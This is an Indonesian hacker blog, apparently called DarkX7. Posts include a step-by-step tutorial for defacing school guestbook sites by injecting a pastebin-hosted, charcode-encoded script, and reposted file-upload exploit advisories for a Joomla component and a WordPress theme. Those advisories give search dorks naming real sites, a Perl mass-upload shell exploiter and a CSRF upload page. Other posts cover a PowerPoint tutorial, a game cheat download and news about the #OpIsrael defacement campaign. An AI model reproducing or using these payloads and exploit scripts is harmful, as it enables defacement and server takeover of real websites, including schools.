Saturday, July 6, 2019

Deface dengan PoC JSO - DarkX7


Deface dengan metode JSO



DORK: inurl:/bukutamu.html site:sch.id (bisa dikembangkan lagi)



Kalau sudah menemukan target, maka kita harus mempunyai script deface jso terlebih dahulu.
Caranya adalah dengan menyiapkan script deface masing" (ext.html) lalu pergi ke web http://jdstiles.com/java/cct.html

Copy semua script deface html kalian, lalu paste pada bagian/kolom "Web Design"

Setelah, mempaste tinggal mengklik "CharcodeAt()"

Maka langsung muncul kode/angka pada bagian kolom sebelah kanan. Lalu, kalian copy lagi hasil/charcodenya.

Nah, tinggal disisipkan ke script ini : document.documentElement.innerHTML=String.fromCharCode(pastekan kode disini)

Contoh : document.documentElement.innerHTML=String.fromCharCode(60, 104, 116, 109, 108, 32, 100, 105, 114, 61, 34, 114, 116, 108, 34, 62, 10, 10)

Setelah itu, pergi ke https://pastebin.com/  Buat New Paste, lalu paste kode yg diatas ini kedalam kolom.

Save New Pastenya lalu klik "raw", paste lagi link raw pastebinnya kedalam script ini, Contoh:<script type="text/javascript"src="https://pastebin.com/raw/k5GjJ4P4"></script>


Selesai, deh ngebuat script JSOnya tinggal ngedeface..



Pertama, Dorking dulu cari yang vuln. Lalu, Register/Daftar untuk mengisi bukutamu.

Isi aja asal-asalan, yg penting paste/masukkan script ini di bagian/kolom "Pesan/Message/Info"
 <script type="text/javascript"src="https://pastebin.com/raw/k5GjJ4P4"></script> 

Jika vuln, maka tampilan akan langsung berubah..



Contoh Hasil Deface dengan JSO:






Read More ->>

Friday, June 28, 2019

Joomla Com_Attachments Components 3.x Arbitrary File Upload - DarkX7

Image result for joomla



####################################################################

# Exploit Title : Joomla Com_Attachments Components 3.x Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/05/2019
# Vendor Homepage : jmcameron.net
# Software Download Links : jmcameron.net/attachments/
jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip
joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip
joomlacode.org/gf/project/attachments/frs/
github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/
# Software Information Links : extensions.joomla.org/extension/attachments/
joomlacode.org/gf/project/attachments/
joomlacode.org/gf/project/attachments3/
# Joomla Affected Versions :
Joomla 3.4.8
Joomla 3.5.1
Joomla 3.6.5
Joomla 3.8.1
Joomla 3.8.11
Joomla 3.8.3
Joomla 3.9.6
# Software Affected Versions [ Component Com_Attachments ] : 
2.2.2 and 3.2.6 - 3.x / All previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : 
inurl:/index.php?option=com_attachments&task=upload
intext:Copyright (C) 2006-2020 BSA Troop 444. All Rights Reserved.
intext:Treadmill Desk from TrekDesk
intext:Copyright © 2015 Ashleigh-D. All rights reserved. Website designed by Mojosync Pty Ltd using Joomla
intext:Fundación Jesuitas Paraguay
intext:© 2019 Mars Society Polska
intext:Designed by atict.com
intext:Copyright © 2017. All Rights Reserved.Webaloss - Realizzazione siti webwebaloss.com
intext:Designed by Burosphere.
intext:Conselho Nacional de Recursos Hídricos CNRH Ministerio Do Desenvolvimento Regional
and more on Google and other Search Engines...... Have Fun....
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link [ Similar ] : dl.packetstormsecurity.net/1902-exploits/joomlaattachments326-shell.txt

####################################################################

# Description about Software :
***************************
The 'Attachments' extension allows files to be uploaded and attached to content
articles in Joomla. Includes a plugin to display attachments and a component
for uploading and managing attachments.

####################################################################

# Impact :
***********
Joomla Attachments Components 3.x and other previous versions could allow a 
remote attacker to upload arbitrary files upload/shell upload, caused by the improper validation 
of file extensions by the multiple scripts to index.php. The issue occurs because 
the application fails to adequately sanitize user-supplied input. 
Exploiting this issue will allow attackers to execute arbitrary code within
the context of the affected application. This may facilitate unauthorized access 
or privilege escalation; other attacks may also possible. 
By sending a specially-crafted HTTP request, a remote attacker could exploit 
this vulnerability to upload a malicious PHP script, which could allow the 
attacker to execute arbitrary PHP code on the vulnerable system.

####################################################################

# Arbitrary File Upload/Unauthorized File Insertion Exploit :
****************************************************
/index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme

/index.php?option=com_attachments&task=upload&uri=file&parent_id=[ARTICLE-ID-NUMBER]/&parent_type=com_content&tmpl=component&from=closeme

Click to " Select file to upload instead "  - Fill the Form -  Published =>  '' Yes '' and Click " Public "

Attach file: - Upload your .txt .jpg .gif .png .phtml .php;.gif file to the vulnerable system.

# Directory File Path :
********************
/attachments/article/[ARTICLE-ID-NUMBER]/kingskrupellos.txt

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

source: https://packetstormsecurity.com/files/153088/Joomla-Attachments-3.x-File-Upload.html
Read More ->>

WordPress Satoshi Themes 2.0 CSRF Arbitrary File Upload - DarkX7


Image result for wordpress

####################################################################

# Exploit Title : WordPress Satoshi Themes 2.0 CSRF Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 05/06/2019
# Vendor Homepage : vooshthemes.com - tecnoge.com - netsons.com
# WordPress Affected Versions : 4.7.13 - 3.4.2
# Theme Affected Version : 2.0
# Information Link : themesinfo.com/satoshi-theme-wordpress-portfolio-jpx
themesinfo.com/?search_type=folder&search=satoshi
# Theme used on : 106 websites
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Design By Voosh Themes
inurl:/wp-content/themes/satoshi/ - intext:Design By TecnoGe Informatica - 
# Vulnerability Type : 
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description About Software :
*****************************
Satoshi v2.0 theme WordPress portfolio. A Free Portfolio Theme Developed By Voosh Themes.

####################################################################

# Impact :
***********
WordPress 3.4.2/4.7.13 Satoshi Themes 2.0 is prone to a vulnerability that lets attackers 
upload arbitrary files because it fails to adequately sanitize user-supplied input. 
An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access 
or privilege escalation; other attacks are also possible. This WordPress Theme is
vulnerable to CSRF file upload via ajaxupload.3.5.js. CSRF occurs when the web application 
does not, or can not, sufficiently verify whether a well-formed, valid, consistent request 
was intentionally provided by the user who submitted the request.

####################################################################

# Vulnerability :
***************
/wp-content/themes/satoshi/upload-file.php

Vulnerability Message :
*********************
error

Directory File Path :
******************
/wp-content/themes/satoshi/images/[YOURFILENAME].html

# Arbitrary File Upload / Unauthorized File Insert Perl Exploiter :
********************************************************
#!/usr/bin/perl
use LWP::UserAgent;
# Coded By KingSkrupellos
# Cyberizm Digital Security Army
# Perl Exploiter By CyBeRiZM :)
my $qqvul ="/upload-file.php";#theme path vul
my $datestring = localtime();
($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();

sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
flag();
print "[+] Enter List Of Target : ";
chomp (my $list=<>);
print "[+] Enter Evil File : ";
chomp (my $file=<>);
print "[+] Started : $datestring\n";
open(my $arq,'<'.$list) || die($!);
my @site = <$arq>;
@site = grep { !/^$/ } @site;
close($arq);
print "[".($#site+1)."] URL to test upload\n\n"; 
my $i;
foreach my $web(@site){$i++;
    chomp($web);
    if($web !~ /^(http|https):\/\//){
        $web = 'http://'.$web;
    }
print "[$i] $web \n";
expqq($web);#exploiting website :)
} 
sub expqq{
my $useragent = randomagent();#Get a Random User Agent 
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept 
$ua->timeout(10);
$ua->agent($useragent);
print "[Testing] Exploit Existence \n";
my $url = $_[0]."/wp-content/themes/satoshi/".$qqvul;
my $ss = $_[0]."/wp-content/themes/satoshi/images/".$file;
my $response = $ua->get($url);
if ($response->is_success || $response->content=~/error/){
   print "[OK] Exploit Exists\n";
   print "[*] Sent payload\n";
   my $regex = 'success';
   my $body = $ua->post( $url,
        Content_Type => 'form-data',
        Content => [ 'uploadfile' => ["$file"] ]
   );
   if ($body->is_success ||$body->content=~ /$regex/){
      print "[+] Payload successfully executed\n";
      print "[*] Checking if shell was uploaded\n\n";
      my $res = $ua->get($ss);
      if ($res->is_success){
      print "[Upload] $_[0]/wp-content/satoshi/images/$file\n";
      }
      else {
      print "[Faild] check file\n";
      }
   } 
   else {print "[-] Payload failed : Not vulnerable\n";
   }
}
else {
print "[No] Exploit Not Found\n";
}
}
sub flag {print "\n[+] WP Satoshi Theme File Upload Exploiter By Cyberizm Digital Security Team \n[*] Coder => Cyberizm \n\n";
}

####################################################################

Cross Site Request Forgery CSRF Exploiter :
*****************************************
<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <title></title>
      <script type='text/javascript' src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
      <script type='text/javascript' src="http://localhost/wp-content/themes/satoshi/js/ajaxupload.3.5.js"></script>

<script type='text/javascript'>//<![CDATA[ 
window.onload=function(){

 $(function(){
  var btnUpload=$('#upload');
  var status=$('#logo-upload-status');
  new AjaxUpload(btnUpload, {
   action: 'http://localhost/wp-content/themes/satoshi/upload-file.php',
   name: 'uploadfile',
   onSubmit: function(file, ext){
                /*
     if (! (ext && /^(jpg|png|jpeg|gif|html|txt)$/.test(ext))){ 
                    // extension is not allowed 
     status.text('Only HTML,TXT, JPG, PNG or GIF files are allowed');
     return false;
    }*/
    status.text('Uploading...');
   },
   onComplete: function(file, response){
    //On completion clear the status
    status.text('');
    //Add uploaded file to list
    if(response==="success"){
     $('<li></li>').appendTo('#files').html('<img src="http://localhost/wp-content/themes/satoshi/images/'+file+'" alt="" /><br />'+file).addClass('success');
     $('#satoshi_logo_image').val(file);
    } else{
     $('<li></li>').appendTo('#files').text(file).addClass('error');
    }
   }
  });
  
 });
}//]]>  
</script>

</head>
<body>
  
<span id="logo-upload-status"></span>
<input class="logo-name" id="satoshi_logo_image" type="text" name="satoshi_logo_image" value="">
<input type="button" class="background_pattern_button" id="upload" value="Choose Logo">
  
</body>
</html>

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

source:https://dl.packetstormsecurity.net/1906-exploits/wpsatoshi20-xsrfupload.txt
Read More ->>

Monday, August 18, 2014

Tutorial Microsoft power Point - DarkX7



Microsoft Power Point adalah suatu software yang akan membantu dalam menyusun sebuah presentasi yang efektif, professional, dan juga mudah. Microsoft Power Point akan membantu sebuah gagasan menjadi lebih menarik dan jelas tujuannya jika dipresentasikan karena Microsoft Power Point akan membantu dalam pembuatan slide, outline presentasi, presentasi elektronika, menampilkan slide yang dinamis, termasuk clip art yang menarik, yang semuanya itu mudah ditampilkan di layar monitor komputer.

  • Menyimpan File Membuka File Klik Office Button  Klik Office Button Klik Save As, cara Klik Open menyimpan file misal :  Pilih & klik nama File yang PowerPoint 97- 2003 akan dibuka Persentasi Klik Preveous Locations (lokasi meyimpan file) Isi nama file pada File Name Klik Save

  • Membuat Slide Baru Menghapus Slide Klik Menu Home Klik Menu Home Klik New  Pilih Slide Layout Slide/Layout yang akan dihapus Pilih Slide Layout Klik Delete yang diinginkan MEMBUAT & MENGHAPUS FILE PERSENTASI

  • Memilih Slide Design Mengubah Background Klik Menu Design Klik kanan Layout Pilih bentuk Slide Klik Format Backround yang dibutuhkan Pilih salah satu jenis Fill - Solid Fill - Gradient Fill - Picture or Tecture Fill
  • MENGGUNAKAN PILIHAN CONTENTMenyisipkan Chart  Insert Clip Art Klik Menu Insert  Klilk Menu Insert Klik Chilih Tipe Char (Column, Line ,Pie dst)  Klik Clip Art Isi Data Table  Pilih Gambar Pilih Quick Layout ( Layout  Drag Gambar pada posisi Tabel ) Pilih Quick Style ( Style yang diinginkan Tabel)
  • MENGGUNAKAN PILIHAN CONTENT Menyisipkan Photo  Menyisipkan Shapes Klik Menu Insert  Klilk Menu Insert Klik Photo Album Klik File/Disk  Klik Shapes Pilih Gambar  Pilih Gambar Klik Insert  Klik pada posisi yang Klik Kanan Copy (Tempatkan pada Slide yang dituju) diinginkan Klik Paste 
  • Animasi Slide Design Costom Animasi Klik Menu Animations  Klik Menu AnimationsPilih & Klik Bentuk Animasi  Blok Text/Gambar  Klik Costom Animations  Klik Add Effect  Tampil Menu Entrance,Emphasis,Exit, Mation Paths  Pilih Animasi yang diingankan
     
  • MENJALANKAN SLIDE Klik Menu Slide Show Pilih Salah Satu: - From Beginning (dari slide awal) - From Current Slide (dari Slide yang aktif)
     
  • Menggunakan Animasi Animasi Sound/  Animasi Movie/ musik video- Klik insert, pilih sound - Klik insert, pilih- Pilih sound from file movie- Pilih lagu yang - Pilih movie from file inginkan - Pilih video yang- Klik automatically inginkan- Sisipkan gambar - Klik automatically speaker - Sisipkan gambar video 
  • SELAMAT BELAJAR

Read More ->>

Wednesday, July 16, 2014

Release 16 Juli 2014 Cheat POINT BLANK -DarkX7



 

Download File Gratis
No Password

Fiture Cheat :
Anti Banned ID Point Blank/ Char 100%
Wallhack Mode
Name Wallhack
Unlimited Ammo All Weapon Reloaded
Auto Skill mode
Anti Spawn or No respawn
Auto Quick Change Mode
Auto Hp +20
No Recoil
Awp lurus
SG 1 Hit / One Hit Weapon
Jump Mode / Fly Mode
Hotkey :
Anti Banned ID = Langsung Aktif / Auto ON
Wallhack Mode = INSERT  ON / OFF
Unlimited Ammo =  F9 ON / OFF
Burst piso 1 Hit = END ON / OFF
Skill,Quck change+Auto Fullhack Tero/ Teroris/ team Merah= F10 ON / F12 OFF 
Skill,Quck change+Auto Fullhack Police / Polisi / team Biru= F11 ON / F12 OFF  
No Recoil + AWP Lurus = Home ON / OFF
Jump/Fly mode = F5 ON / OFF

=======
Tutorial  :
=======
Buka Cheat
Buka PB Launcher
Star Cheat
Happy Cheatting!

*Petunjuk
Untuk Windows 7,8 Ketika buka cheat dan Point Blank gunakan klik kanan run as administator
Untuk Aktifkan cheat di dalam permainan/ In Game Hack

Created By
New Pekalongan Kommunity
Read More ->>

Tuesday, July 15, 2014

Hacker Israel Balas Serangan - DarkX7

Mereka semua adalah para aktivist dari grup dan komunitas hacking yang bersatu serta tergabung dalam sebuah operasi dengan nama kode #OpIsrael #OpSaveGaza. Beragam target telah berhasil dilumpuhkan dengan upaya DDos serta banyak juga situs yang telah berubah halaman karena di deface.



Hal ini memancing para Hacker Israel balas serangan terhadap Indonesia. Sehingga mereka juga melakukan aksi tindak peretasan ke situs indonesia. Beberapa situs Indonesia juga sudah mengalami perubahan halaman depan (defaced) dengan logo bintang bertuliskan sebagai berikut:

Hacked by Israelite – IEC

Do not touch site Israel!
Do not Interfere with Our Affairs,!

Haii People Indonesian!! STOP For # Op_SaveGaza! Warning !
If you will judge us in the virtual world.

We Will Take Revenge on You, Cyber Indonesia!

IDF – Israel Cyber Army – Israel Elite Cyber – Israel People – .co.il – .il – .gov.il – Israel Defense – Go! Isra – Israil! – Israelite

Show Your Skill Cyber of Indonesia!

Pelaku dengan code nama Israelite menyerukan kepada hacker Indonesia untuk tidak menyentuh atau merusak situs-situs Israel. Ini merupakan serangan pertama dari hacker Israel dimana ditujukan untuk memperingatkan para Hacker Indonesia agar tidak terlalu campur dengan urusan yang terjadi di negara mereka. Beberapa website yang sudah diretas oleh mereka:

http://carapakaikerudung.com/
http://kerajinanrotanmalang.com/index.html

Dari laporan yang kami terima, seorang hactivist mengatakan “Israel kok bahasanya pake google terjemahan.. itu anehh.. wkwkwk ” Menurutnya, kemungkinan tindak peretasan ini bukan berasal dari pihak Israel, tapi dari indonesia atau pihak tertentu yang bertujuan untuk mengkambinghitamkan Israel agar Cyberwar ini terus berkobar dan semakin memanas
Read More ->>

Jim Geovedi Akan Musnahkan Iron Dome Israel - DarkX7

iron-dome

Jim Geovedi Akan Musnahkan Iron Dome Israel 


Sempat heboh di dunia maya khususnya jejaring sosial, bahwa salah satu sang legenda Hacker terkenal asal Indonesia, Jim Geovedi akan ikut membantu dalam penyerangan Israel. Kabar postingan tersebut telah banyak beredar informasinya yang di sharing melalui jejaring sosial yang mengatakan bahwa Jim Geovedi akan Musnahkan iron dome dan meretas situs-situs milik Israel.


Mendengar itu, sang legenda Jim Geovedy seperti yang dituliskan dari akunnya mengatakan bahwa dirinya akan musnahkan Iron Dome Israel atau ikut campur dalam masalah penyerangan Israel itu tidak benar. “Ingin sekali memaklumi dan bilang “namanya juga anak-anak”, tapi kok saya jadi miris dan berpikir, jika di level anak-anak saja sudah jago memanipulasi, bagaimana ketika mereka dewasa nanti?” ungkapnya.
Seperti kita ketahui bersama bahwa serangan cyber ke Israel telah dimulai pada tanggal 11 juli 2014 lalu. Sampai hari ini serangan terus dilancarkan ke wilayah internet Israel dari aksi deface hingga melumpuhkan situs-situs yang berdomain Israel (.il) dengan serangan DDos. Aksi ini sendiri telah didukung oleh banyak perkumpulan dan komunitas hacker dari seluruh Dunia yang ikut membantu dalam penyerangan tersebut.
Read More ->>

Menu

Social Icons